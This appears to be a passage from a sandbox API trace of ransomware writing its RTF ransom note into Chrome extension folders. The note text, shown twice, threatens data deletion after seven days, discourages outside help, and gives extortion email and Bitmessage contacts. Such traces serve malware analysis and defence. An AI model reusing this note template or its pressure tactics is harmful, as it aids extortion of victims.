cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.564] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.565] CloseHandle (hObject=0x2c8) returned 1 [0278.565] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0278.565] GetLastError () returned 0x2 [0278.565] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 